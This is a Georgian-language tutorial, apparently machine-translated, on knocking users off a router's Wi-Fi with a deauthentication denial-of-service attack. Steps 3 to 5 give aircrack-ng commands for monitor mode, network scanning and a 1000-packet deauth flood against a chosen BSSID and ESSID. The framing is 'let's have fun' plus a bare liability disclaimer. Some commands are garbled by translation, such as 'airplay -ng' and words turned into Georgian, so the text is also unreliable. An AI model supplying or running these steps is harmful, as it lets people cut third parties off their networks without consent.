Სარჩევი:

როგორ დავაკაკუნოთ როუტერი ინტერნეტიდან (10 წუთზე ნაკლებ დროში): 6 ნაბიჯი
როგორ დავაკაკუნოთ როუტერი ინტერნეტიდან (10 წუთზე ნაკლებ დროში): 6 ნაბიჯი

ვიდეო: როგორ დავაკაკუნოთ როუტერი ინტერნეტიდან (10 წუთზე ნაკლებ დროში): 6 ნაბიჯი

ვიდეო: როგორ დავაკაკუნოთ როუტერი ინტერნეტიდან (10 წუთზე ნაკლებ დროში): 6 ნაბიჯი
ვიდეო: როუტერი და სრულყოფილი წრე 2024, ნოემბერი
Anonim
როგორ დავაკაკუნოთ როუტერი ინტერნეტიდან (10 წუთზე ნაკლებ დროში)
როგორ დავაკაკუნოთ როუტერი ინტერნეტიდან (10 წუთზე ნაკლებ დროში)

ამ სახელმძღვანელოში მე ვაპირებ გაჩვენოთ როგორ აწარმოოთ DOS (მომსახურების უარყოფა) შეტევა როუტერის წინააღმდეგ. ეს დაბლოკავს ხალხს როუტერის გამოყენებაზე, რომელსაც თქვენ ესხმიან თავს.

დავიწყოთ XKCD– ით

ეს გაკვეთილი მხოლოდ განსაზღვრავს, თუ როგორ უნდა განახორციელოთ შეტევა linux სისტემიდან, ნუ მოგწყინდებათ, ძალიან ადვილია Kali linux– ის ცოცხალი ვერსიის გაშვება (რასაც მე ვიყენებ (aircrack-ng არის წინასწარ დაინსტალირებული)) ან სხვა linux distro (თუ თქვენ იყენებთ სხვა linux დისტროს, თქვენ დაგჭირდებათ aircrack-ng– ის დაყენება), აქ არის ორი ვებ გვერდი, რომლებიც გაგივლით, თუმცა კალი გადის USB დისკიდან https://docs.kali.org/downloading/kali-linux -live-usb-installhttps://24itworld.wordpress.com/2016/12/11/how-to-run-live-kali-linux-from-usb-drive/

ეს შეიძლება იყოს უკანონო იქ, სადაც ცხოვრობ ამან არ უნდა ზიანი მიაყენოს როუტერს, მაგრამ შეიძლება ზიანი მიაყენოს როუტერს, გამოიყენეთ თქვენივე რისკით.

Მოდი გავერთოთ.

ნაბიჯი 1: მე არ ვარ პასუხისმგებელი, თუ ეს მოხდება

მე არ ვარ პასუხისმგებელი, თუ ეს მოხდება
მე არ ვარ პასუხისმგებელი, თუ ეს მოხდება

ნაბიჯი 2: ვიდეო მათთვის, ვინც ამჯობინებს ერთს

Image
Image

ნაბიჯი 3: დააყენეთ Wifi ადაპტერი მონიტორის რეჟიმში

დააყენეთ Wifi ადაპტერი მონიტორის რეჟიმში
დააყენეთ Wifi ადაპტერი მონიტორის რეჟიმში

iwconfig #იპოვეთ wifi ადაპტერის სახელი

airmon-ng შემოწმება kill #დარწმუნდით, რომ airmon-ng არ მუშაობს

airmon-ng დაიწყეთ wlan0 #დაწყება airman-ng და დააყენეთ wlan0 მონიტორის რეჟიმში (შეცვალეთ wlan0 თქვენი wifi ადაპტერის სახელით)

ნაბიჯი 4: მოძებნეთ ხელმისაწვდომი ქსელები

იპოვეთ ხელმისაწვდომი ქსელები
იპოვეთ ხელმისაწვდომი ქსელები

iwconfig #fif wifi ადაპტერის სახელი (ჩემს შემთხვევაში ის შეიცვალა wlan0mon– ით)

airodump-ng wlan0mon #მონიტორინგი ხელმისაწვდომი ქსელების wlan0mon გამოყენებით (შეცვალეთ wlan0mon თქვენი wifi ადაპტერის სახელით)

ნაბიჯი 5: გააგზავნეთ უსარგებლო პაკეტები

გაგზავნეთ უსარგებლო პაკეტები
გაგზავნეთ უსარგებლო პაკეტები
გაგზავნეთ უსარგებლო პაკეტები
გაგზავნეთ უსარგებლო პაკეტები

აქ არის ბოლო ბრძანება

airplay -ng --deauth 1000 -a C0: 56: 27: 4A: 3F: B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon

ახლა მე ვაპირებ აგიხსნათ რას აკეთებს ამ ბრძანების თითოეული ნაწილი

airplay-ng --deauth 1000 #ეს ნაწილი აგზავნის 1000 უსარგებლო პაკეტს

-a C0: 56: 27: 4A: 3F: B2 -e "NETGEAR94 2.4GHz_Ext" wlan0mon #გაგზავნეთ ეს პაკეტები როუტერზე BSSID "C0: 56: 27: 4A: 3F: B2" & ESSID "NETGEAR94 2.4GHz_Ext"

შეცვალეთ BSSID და ESSID როუტერის BSSID და ESSID, რომელზეც გსურთ შეტევა.

გააგზავნეთ ეს პაკეტები wifi ადაპტერით "wlan0mon" (შეცვალეთ wlan0mon თქვენი wifi ადაპტერის სახელით)

ნაბიჯი 6: წარმატება

წარმატებები!
წარმატებები!

ეს ისეთივე მარტივია, როგორც ეს.

პაკეტების გაგზავნის შესაჩერებლად დააჭირეთ CTL+C ან დახურეთ ტერმინალი.

ბოლო ბრძანების ხელახლა გასაშვებად დააჭირეთ ზემოთ ისარს და შემდეგ შეიყვანეთ.

აქ არის Aircrack-ng– ის ვებ – გვერდი

გირჩევთ: